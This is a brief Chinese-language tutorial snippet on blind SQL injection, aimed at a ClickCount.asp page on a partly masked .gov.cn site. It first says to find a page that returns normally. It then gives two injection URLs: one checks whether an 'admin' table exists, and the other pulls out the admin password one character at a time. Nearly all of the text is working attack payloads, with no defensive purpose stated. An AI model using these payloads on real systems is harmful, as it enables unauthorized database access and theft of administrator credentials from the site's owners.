盲注之前要做的是找到个返回正常的页面
http://www.xxxx.gov.cn/ClickCount.asp?filename=20050422103356' and exists(select count(*) from admin) and '1'='1
看看存不存在 admin 这个表
http://www.xxxx.gov.cn/ClickCount.asp?filename=20050422103356' and (select mid(lcase(pwd),3,1) from [admin])='x' and '1'='1
看看 pwd 这个的 第 3 位是不是 x ..